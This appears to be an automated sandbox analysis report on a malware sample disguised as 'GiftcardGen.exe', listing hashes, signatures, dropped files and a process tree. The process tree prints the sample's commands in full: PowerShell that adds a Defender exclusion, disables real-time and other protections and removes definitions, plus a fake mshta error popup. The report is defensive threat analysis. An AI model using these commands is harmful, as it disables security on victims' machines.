Analysis

  • max time kernel
    106s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/03/2025, 17:19

General

  • Target

    GiftcardGen.exe

  • Size

    7.7MB

  • MD5

    f5af07e70e0fc5e0edb2d58ae5117a6a

  • SHA1

    cb92b482a5c5736ea73309930e8529f4e1556aa2

  • SHA256

    f2d0eb0e4b29165a46d533f9bc5733d318aae5e9a8b325ef5fc9dbcb8b296b00

  • SHA512

    199b39ab61c96a15101bea5998aab840ded3a4098a746c5fab2dcf177759053ddf96df5b8eada5de72aa35d3b93d994259f94da0515431f6d775aabc6ec671de

  • SSDEEP

    196608:hWWx06+AjwfI9jUCD6rlaZLH7qRGrGIYUoZy8FUsOnAoG:YfIH20drLYRZjoG

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Loads dropped DLL 17 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • UPX packed file 49 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\GiftcardGen.exe
    "C:\Users\Admin\AppData\Local\Temp\GiftcardGen.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1248
    • C:\Users\Admin\AppData\Local\Temp\GiftcardGen.exe
      "C:\Users\Admin\AppData\Local\Temp\GiftcardGen.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GiftcardGen.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GiftcardGen.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4996
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4924
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Data stream corruption detected in file', 0, 'Error', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Data stream corruption detected in file', 0, 'Error', 32+16);close()"
          4⤵
            PID:5756
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3600
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3784
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1080
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:1284

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        c81ca666e67245b726b98f2a89cffb59

        SHA1

        1a0e64d1598cc06046a8cc8ca7bdd81ec9d10dea

        SHA256

        7a0053c526f90fe433ec6b754255cc75ee1a84714663c076530cdae3b8068cd4

        SHA512

        b0c4ad98b341cf7bcb615ab100781e23e5e0a2c822e8b2735e82340870b833401d260f30a4b889f725825520bdcab381fd64b729671c60f81f0094a5fcb186ce

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\VCRUNTIME140.dll

        Filesize

        117KB

        MD5

        862f820c3251e4ca6fc0ac00e4092239

        SHA1

        ef96d84b253041b090c243594f90938e9a487a9a

        SHA256

        36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

        SHA512

        2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_bz2.pyd

        Filesize

        50KB

        MD5

        94309558eb827e8315d0f201bbe7f2b1

        SHA1

        b0a511995528860239b595774a1912e8f1220c42

        SHA256

        fe14d1af436b07370607c6798c3eb15fc439837cc9cbe7cbc3271b07c9ed55b6

        SHA512

        1163da89470b4f4f11786961d2b24a0c01939a174415fac8321f402d85c067572f18d7a8f43ec8abdcc6f14dc76f780ec36004ac34593988240f6a7642e60365

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_ctypes.pyd

        Filesize

        64KB

        MD5

        fc40d41aff12417142c0256e536b4a1a

        SHA1

        237157d6af4ec643c4d8480cf3d332951a791cc1

        SHA256

        0712d9412ea0d276c9a726765c072e00146f5aea853818d177b1a5b425839641

        SHA512

        b7625a5325a5b184b1733931dc3857ea5c118d85a506875dcb6b195c2372723b9c6cf80e4688c0fc1383ea063c9d831dd4c0e10ec429dd0f363aa678b1c99f6b

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_decimal.pyd

        Filesize

        119KB

        MD5

        0e02b5bcde73a3cc01534fba80ec0462

        SHA1

        decd14b79adf47cc74085beed8a997552d97b965

        SHA256

        286c99901c103d39c3e79bf30ce06f2825260e04ef7d2f0d77fcc08fb93e1d4b

        SHA512

        9556fbd408a5f5e0c21212cda2e2c164cd5093bb8668c152db4b72d03944f1f172ac8e0e194b3eedd1d4697ca2e7d50fcc77fe47014eda14ab658648005cb338

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_hashlib.pyd

        Filesize

        36KB

        MD5

        933a6a12d695c7d91ef78a936ab229c7

        SHA1

        ff16c267921ed4dd7f2a129df675a2bc6a52be2a

        SHA256

        60d239d691eb3e31d99848ba9167b5797c897b2896fa5605e61f5bce08e9cb11

        SHA512

        fd5416529061851e90aba6782e1550d9c48d0b10d39f52bd3ff984fbb88d0c06ee54675108508aad819d49362fb6ba74e9d3ad6dd0f3aa17654a07cae6ae099a

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_lzma.pyd

        Filesize

        87KB

        MD5

        042ac1b18a7f6fff8ed09ec9efa9e724

        SHA1

        643f3dca141f8fea4609b50907e910be960ce38a

        SHA256

        491b8a4f143c7a505e7c36a2279e84aca902e65a1e28aa6d50bcc37dbf6b5334

        SHA512

        940a44363d385e4e9fa23c06cf6d013d2585424e6a174e2afbdaa5a0cd21836a5df438859eff45a3b6e70e47322d8c8c5fa5d83315be34cfd6769e8fc2084a21

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_queue.pyd

        Filesize

        27KB

        MD5

        1073d3147f0d6a1880b78a5a5695fc70

        SHA1

        d97b690c490a51182e9757c15d14dfefd840e746

        SHA256

        65ad239871835a3823401647b2dad935075b4e33a5913fd12d7f2a02b6c49d82

        SHA512

        45d046d2e702447aa00bada25d76fe17c3a4c8822ac62739fe820e9eac66c5262323d66ad90cddde31dd01ecd6db0128cd96950e9857c9c5c59524027c75255f

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_socket.pyd

        Filesize

        45KB

        MD5

        fcfdf8cd83a8d506a4483a72eb57026c

        SHA1

        74428908c0068c3de2f4281aba16c13cdd28be04

        SHA256

        2a6b686817b640dcabc58e60289d9ace9ace3e4bc217d78953439549cee65a8a

        SHA512

        3b63e08370fa76ca8c81fc7639492367d250d507f0fb7e0e582078997ba2fa246c48eeaa9faed866dface4fcb08319096a83048dc333ad4be21947f5146b1768

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_sqlite3.pyd

        Filesize

        59KB

        MD5

        1e16d084725d9b79f17ccb1996df7410

        SHA1

        3c49ba7b3acf317eedaa7c75319f1b39f91b79ba

        SHA256

        cc17586da3a099b45644ce76cd53ffcb3f5836e9db213152e3a880569c50ca7a

        SHA512

        4932f891e386792a03f6340ac7c9fe9dfd52e6f4a948951520c24b5f6204b26e3fc9455658e52efdce188a98c1e0f33d86493547dad47517ffafb9bb2c088549

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\_ssl.pyd

        Filesize

        68KB

        MD5

        0a56191c7fb0ae4f75de0859aeba458f

        SHA1

        6b1c4d1906bea388c6690fe93f12013db959a4f9

        SHA256

        e07199062e32fb086f8cb35c36239f1bdfe15ea10f72864fed1953dc0c2dd61c

        SHA512

        014b18a33f7ed88f4c326a7981ec670c197d1fba54f7e050c64fe409551cdc89e8fc3ce7205cd8f45cc548c6982e00049e03ea2aeb2360b1c85ce9beb1aa8410

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\base_library.zip

        Filesize

        1.3MB

        MD5

        6e116776ab4e76a61cb7c8ab148f30a3

        SHA1

        5d05b2a04f080898b0064ea91bf001761d605716

        SHA256

        e4a4bd3a306ce0ddfb21c8634e1b669bbb19bc39f8a37e6c3ffdf284380d2cd2

        SHA512

        3c40e577d453cedb92fa0cd44ffe3483c0827baa3b0373f650afd6229789a2cac3442ea079e20f24e3f48824520d3c4c5f4974b248c0f778379c99a90da871a4

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\blank.aes

        Filesize

        110KB

        MD5

        8dbef310bf18d30f069cadc5f11b6e94

        SHA1

        2d0cd99ff9df0fb8722f80ae3a07572f107434ae

        SHA256

        c71780aab832e126fe5c2ad412b4cb703aac85c2b9c0ab2704c1831e36f041b0

        SHA512

        54bb0a03d17f9905fd7fc1947674c1f0542a7308dd737b12abe092c06a649507cc49ce1bf62091d6dbd1073a8a46f0a8da2a7519d5b84847ed03b592a1eee3b2

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\blank.aes

        Filesize

        110KB

        MD5

        8b00c1de2b4c48e01cd725af46e0db99

        SHA1

        b80dedb4337b6941c995e2aa00e430cca252cfa7

        SHA256

        884db12a6e0d0757ab36ded981d22a492b42e83be7e3a66d4ca23845b0ce82cd

        SHA512

        619f9186aae3b77ebf9f0cd7d3a52384ce9809353e7bf293e59a952774b5a1b9a42a1d8d5aeefca96291cd0bc72439313655551cb54792a93ac81a13410e3371

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\libcrypto-3.dll

        Filesize

        1.6MB

        MD5

        8377fe5949527dd7be7b827cb1ffd324

        SHA1

        aa483a875cb06a86a371829372980d772fda2bf9

        SHA256

        88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

        SHA512

        c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\libffi-8.dll

        Filesize

        29KB

        MD5

        08b000c3d990bc018fcb91a1e175e06e

        SHA1

        bd0ce09bb3414d11c91316113c2becfff0862d0d

        SHA256

        135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

        SHA512

        8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\libssl-3.dll

        Filesize

        221KB

        MD5

        b2e766f5cf6f9d4dcbe8537bc5bded2f

        SHA1

        331269521ce1ab76799e69e9ae1c3b565a838574

        SHA256

        3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

        SHA512

        5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\python313.dll

        Filesize

        1.8MB

        MD5

        2a4aad7818d527bbea76e9e81077cc21

        SHA1

        4db3b39874c01bf3ba1ab8659957bbc28aab1ab2

        SHA256

        4712a6bb81b862fc292fcd857cef931ca8e4c142e70eaa4fd7a8d0a96aff5e7e

        SHA512

        d10631b7fc25a8b9cc038514e9db1597cec0580ee34a56ce5cfc5a33e7010b5e1df7f15ec30ebb351356e2b815528fb4161956f26b5bfaf3dce7bc6701b79c68

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\rar.exe

        Filesize

        615KB

        MD5

        9c223575ae5b9544bc3d69ac6364f75e

        SHA1

        8a1cb5ee02c742e937febc57609ac312247ba386

        SHA256

        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

        SHA512

        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\rarreg.key

        Filesize

        456B

        MD5

        4531984cad7dacf24c086830068c4abe

        SHA1

        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

        SHA256

        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

        SHA512

        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\select.pyd

        Filesize

        26KB

        MD5

        fbb31cb3990b267f9c5fb02d1aa21229

        SHA1

        cdae1c90d80c81927edb533fb5850c6efd541812

        SHA256

        8e2c5b74031b80a20bd16c149a389e60b3845d9719d97e030c42e9718cc08937

        SHA512

        af71f8be59d062cb4d095772e30ba63d0fef1e8285d549d7638c009cd67a2610f6d07e486e75f3eb1d94d8dc349d92b996f3ef83bd1d1c3617ac801d571be439

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\sqlite3.dll

        Filesize

        645KB

        MD5

        a7a7f5664333083d7270b6f6373c18b2

        SHA1

        f8b7729e18c1dad2974514fc685aaa05ed3ff513

        SHA256

        85b1d4d0b7db01ecb9b8c6b1b68ab122e0807eaa607551ba08849fdd957b889a

        SHA512

        cd9a0d4a55a58f18ce565f1525339e84f22496b6264f1fa235310ff6fa3531a0b24fe6e90bdf21b8f9ef2556e726480fe3bd7e69d737f5a580d6bd3e0b8d799f

      • C:\Users\Admin\AppData\Local\Temp\_MEI12482\unicodedata.pyd

        Filesize

        261KB

        MD5

        48a942c3930a1fee7d4404989171f5fb

        SHA1

        b6ea31aedbc3d17136b7c7015f687020dd8723d4

        SHA256

        bc52593f047cba026641ebd758133551289dcca17817c836cbb006d4529d7aa7

        SHA512

        dcea8380f7c7a38cc827bd685cd76ac4d3dc2635f42675f5afaa8ab9e07fb72fc5f6e6fc246bb82f88bf8459caa09f4a0dd6c0d145e245986cfd15d0a49d1c59

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rs3wfmcg.gb5.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2600-66-0x00007FF8EB0E0000-0x00007FF8EB113000-memory.dmp

        Filesize

        204KB

      • memory/2600-30-0x00007FF8EEDE0000-0x00007FF8EEE07000-memory.dmp

        Filesize

        156KB

      • memory/2600-60-0x00007FF8EAE70000-0x00007FF8EAFEF000-memory.dmp

        Filesize

        1.5MB

      • memory/2600-62-0x00007FF8EB4D0000-0x00007FF8EB4E9000-memory.dmp

        Filesize

        100KB

      • memory/2600-64-0x00007FF8EE6C0000-0x00007FF8EE6CD000-memory.dmp

        Filesize

        52KB

      • memory/2600-52-0x00007FF8EE9F0000-0x00007FF8EEA1B000-memory.dmp

        Filesize

        172KB

      • memory/2600-71-0x00007FF8EAD40000-0x00007FF8EAE0E000-memory.dmp

        Filesize

        824KB

      • memory/2600-72-0x0000026A7F040000-0x0000026A7F573000-memory.dmp

        Filesize

        5.2MB

      • memory/2600-74-0x00007FF8EEDE0000-0x00007FF8EEE07000-memory.dmp

        Filesize

        156KB

      • memory/2600-73-0x00007FF8DB380000-0x00007FF8DB8B3000-memory.dmp

        Filesize

        5.2MB

      • memory/2600-70-0x00007FF8DBCB0000-0x00007FF8DC314000-memory.dmp

        Filesize

        6.4MB

      • memory/2600-76-0x00007FF8EB420000-0x00007FF8EB434000-memory.dmp

        Filesize

        80KB

      • memory/2600-78-0x00007FF8EB5D0000-0x00007FF8EB5DD000-memory.dmp

        Filesize

        52KB

      • memory/2600-80-0x00007FF8EA6F0000-0x00007FF8EA7A3000-memory.dmp

        Filesize

        716KB

      • memory/2600-50-0x00007FF8EECA0000-0x00007FF8EECB9000-memory.dmp

        Filesize

        100KB

      • memory/2600-25-0x00007FF8DBCB0000-0x00007FF8DC314000-memory.dmp

        Filesize

        6.4MB

      • memory/2600-48-0x00007FF8F0DC0000-0x00007FF8F0DCF000-memory.dmp

        Filesize

        60KB

      • memory/2600-58-0x00007FF8EE020000-0x00007FF8EE045000-memory.dmp

        Filesize

        148KB

      • memory/2600-106-0x00007FF8EE020000-0x00007FF8EE045000-memory.dmp

        Filesize

        148KB

      • memory/2600-107-0x00007FF8DBCB0000-0x00007FF8DC314000-memory.dmp

        Filesize

        6.4MB

      • memory/2600-132-0x00007FF8EAD40000-0x00007FF8EAE0E000-memory.dmp

        Filesize

        824KB

      • memory/2600-131-0x00007FF8EB0E0000-0x00007FF8EB113000-memory.dmp

        Filesize

        204KB

      • memory/2600-130-0x00007FF8EE6C0000-0x00007FF8EE6CD000-memory.dmp

        Filesize

        52KB

      • memory/2600-129-0x00007FF8EB4D0000-0x00007FF8EB4E9000-memory.dmp

        Filesize

        100KB

      • memory/2600-128-0x00007FF8EAE70000-0x00007FF8EAFEF000-memory.dmp

        Filesize

        1.5MB

      • memory/2600-127-0x00007FF8EE020000-0x00007FF8EE045000-memory.dmp

        Filesize

        148KB

      • memory/2600-126-0x00007FF8EE9F0000-0x00007FF8EEA1B000-memory.dmp

        Filesize

        172KB

      • memory/2600-125-0x00007FF8EECA0000-0x00007FF8EECB9000-memory.dmp

        Filesize

        100KB

      • memory/2600-124-0x00007FF8F0DC0000-0x00007FF8F0DCF000-memory.dmp

        Filesize

        60KB

      • memory/2600-123-0x00007FF8EEDE0000-0x00007FF8EEE07000-memory.dmp

        Filesize

        156KB

      • memory/2600-122-0x00007FF8DB380000-0x00007FF8DB8B3000-memory.dmp

        Filesize

        5.2MB

      • memory/2600-121-0x00007FF8EA6F0000-0x00007FF8EA7A3000-memory.dmp

        Filesize

        716KB

      • memory/2600-120-0x00007FF8EB5D0000-0x00007FF8EB5DD000-memory.dmp

        Filesize

        52KB

      • memory/2600-119-0x00007FF8EB420000-0x00007FF8EB434000-memory.dmp

        Filesize

        80KB

      • memory/4996-99-0x0000019C577A0000-0x0000019C577C2000-memory.dmp

        Filesize

        136KB